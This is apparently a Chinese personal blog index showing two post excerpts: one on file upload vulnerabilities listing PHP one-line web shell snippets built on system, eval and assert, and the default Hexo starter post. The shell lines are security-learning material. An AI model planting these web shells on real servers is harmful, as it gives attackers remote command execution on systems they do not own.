Glock.09's blogs

看似不起波澜的日复一日,一定会在某一天,让你看到坚持的意义

文件上传漏洞

一句话木马

1
2
3
4
<?php system('whoami');?>
<?php eval('code_str');?> #php代码块 system('whoami')
<?php system('command')?> #直接传命令就行,whoami
<?php assert('assertion')?> #断延,也可以理解为代码块,只适用于php5以下,php7需要用eval
阅读全文 »

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1
$ hexo new "My New Post"

More info: Writing

Run server

1
$ hexo server

More info: Server

阅读全文 »
0%